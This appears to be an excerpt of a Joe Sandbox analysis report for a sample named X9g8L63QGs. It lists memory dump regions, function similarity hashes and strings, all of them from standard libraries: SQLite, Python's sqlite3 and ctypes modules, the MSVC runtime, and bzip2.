                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716138569.00007FFB1D5B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716221369.00007FFB1D5BA000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716259793.00007FFB1D5BC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1d5b0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: b57b117b731fe6fadf01a2aa5e6dfd03c7664753ee25818152bc9f2dcd8646e2
                                                                                                                                                                                                                                                                    • Instruction ID: b71b467a31af8f517c4930e8631eb92ce16f5ab412854cdd3834d63191835016
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b57b117b731fe6fadf01a2aa5e6dfd03c7664753ee25818152bc9f2dcd8646e2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE818AA1E0CE4386FA949B76D441AB97293AF8D7A0F548335DE0D97696FF3CE8058700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2846519077
                                                                                                                                                                                                                                                                    • Opcode ID: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                                                    • Instruction ID: b81e9b527ff7efcf1b31070570f902784f109845723cc08e3c5e8d03cb392498
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9b62292e15983dd92f3d336a42f126a0ce1eb18eb7dc8c6fabe0fe700413ad5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27029DF2A0868286EB149B31D418BAA37A5FF85B84F408235DA8D07796EF3CE555C708
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 211107550-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                                                                                    • Instruction ID: 01707ce710b01b15d1389618744436e6178d0282794980ae9cffa40c253f3bbb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E183F2908A818BE710AF74D4483EE77A2FB56768F244135EA8D57795DF38E881C780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007F805
                                                                                                                                                                                                                                                                    • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$argument 1$execute$factory must return a cursor, not %.100s$str
                                                                                                                                                                                                                                                                    • API String ID: 4011786353-652842647
                                                                                                                                                                                                                                                                    • Opcode ID: 269fade6d050ff23afb70b2ed00da13a9c7e305b9570e32f8a79332b38a23695
                                                                                                                                                                                                                                                                    • Instruction ID: cda3a872c6ff2242a8c1601fa1d6f39b4534e31376831215d223b3bf7d7dc6b9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 269fade6d050ff23afb70b2ed00da13a9c7e305b9570e32f8a79332b38a23695
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F9138F2A09A42C6EA548F76E45897923A0FF85F95F1050B2CA0E43764EF7DE886C740
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: new[]
• String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
• API String ID: 4059295235-3840279414
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
• API String ID: 2943138195-2239912363
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007
• String ID: delete$insert$replace$update
• API String ID: 3568877910-310407209
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007
• String ID: delete$insert$replace$update
• API String ID: 3568877910-310407209
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007
• String ID: delete$insert$replace$update
• API String ID: 3568877910-310407209
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1404302391
                                                                                                                                                                                                                                                                    • Opcode ID: 5ae81091e86e25a5368a2a49817f595d8c0bef1ad97d726da483eeb57a43f45b
                                                                                                                                                                                                                                                                    • Instruction ID: 61ad898ff7a1e89345e04de3a076b005ace9d89001a8dc87e6b8b8123864d1db
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae81091e86e25a5368a2a49817f595d8c0bef1ad97d726da483eeb57a43f45b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF19CE1A0DA4286FA649B35E898B7933A9BF40F90F584135DA4D473A5EF3CE446C34C
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C058
                                                                                                                                                                                                                                                                    • String ID: Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.
                                                                                                                                                                                                                                                                    • API String ID: 3574868227-2922342969
                                                                                                                                                                                                                                                                    • Opcode ID: 35545b6d8455ecd6957b139098b76e7acc93c7997bf4f99056b34d33aed98f76
                                                                                                                                                                                                                                                                    • Instruction ID: 91c2c53d913a2186a693a6dcda94a324950cdd101254569d57969d45f8a4fc2a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35545b6d8455ecd6957b139098b76e7acc93c7997bf4f99056b34d33aed98f76
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE8127F6A09A02C6EB149F75E45CA7833A0FF85B89F1444B2CA0E476A4DF3DE586C340
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Free$String$ErrorFromInfoLocalProg
                                                                                                                                                                                                                                                                    • String ID: iu(uuuiu)
                                                                                                                                                                                                                                                                    • API String ID: 3403921354-1877708109
                                                                                                                                                                                                                                                                    • Opcode ID: 379d610efde80aea7e25e5220ffef6de210be6735cddb587e3987a17ea792276
                                                                                                                                                                                                                                                                    • Instruction ID: 831989f6d2b9ac0a7ab43973e9492a9acd1e1011dd706f97e54295d77df4b06c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 379d610efde80aea7e25e5220ffef6de210be6735cddb587e3987a17ea792276
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9151DB66B15E058AEB009F76E4643AC2371FB99F99F009136DE0E57B68DF38D509C350
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255729
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255737
                                                                                                                                                                                                                                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255750
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C255762
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C2557D0
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFB1C255863,?,?,00000000,00007FFB1C255694,?,?,?,?,00007FFB1C2553D1), ref: 00007FFB1C2557DC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                                    • API String ID: 916704608-2084034818
                                                                                                                                                                                                                                                                    • Opcode ID: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                                                                                    • Instruction ID: 14e55b0c4373c053991d7ab6004b6431744ed81d3d332738868a50518e7ee7ba
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31D4E1A1AE51D7EE15EB22E8085F623A6BF05B70F690134DD6D47390EF3CE9448390
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                                                                    • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                                                                                                                    • API String ID: 190572456-3856192562
                                                                                                                                                                                                                                                                    • Opcode ID: f689fd5eb29f4f531bea3e8f6701307ec7aded59f8a24d2646ab97d44f2a5c48
                                                                                                                                                                                                                                                                    • Instruction ID: 32be771c48c31120f7f379c792a325d603b09dc318c59774c366c32054fc776a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f689fd5eb29f4f531bea3e8f6701307ec7aded59f8a24d2646ab97d44f2a5c48
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E041E8A5A08E4281EF019B36E954178A3B2BF96FE4F44E036E90E47A74DE2CE5498300
APIs
Memory Dump Source
• Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: abort$AdjustPointer
• String ID:
• API String ID: 1501936508-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: abort$AdjustPointer
• String ID:
• API String ID: 1501936508-0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: FileHeader$ExceptionRaise
• String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
• API String ID: 3685223789-928371585
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID: {for
• API String ID: 2943138195-864106941
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: NameName::atol
• String ID: `template-parameter$void
• API String ID: 2130343216-4057429177
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID: ,...$,<ellipsis>$...$<ellipsis>$void
• API String ID: 2943138195-2211150622
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID: char $int $long $short $unsigned
• API String ID: 2943138195-3894466517
APIs
Strings
• 1.0.8, 13-Jul-2019, xrefs: 00007FFB1BB1C85B
• bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth, xrefs: 00007FFB1BB1C868
• *** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac, xrefs: 00007FFB1BB1C88A
Memory Dump Source
• Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007
• String ID: bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth$*** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac$1.0.8, 13-Jul-2019
• API String ID: 3568877910-989448446
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+$NameName::
• String ID:
• API String ID: 168861036-0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
• API String ID: 3122504284-1299490920
                                                                                                                                                                                                                                                                    • Opcode ID: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
                                                                                                                                                                                                                                                                    • Instruction ID: 68e860147e72075fe797f3b83a5b11ceaebad8fe1ebc3e086bb3a3c80b3d0ea0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
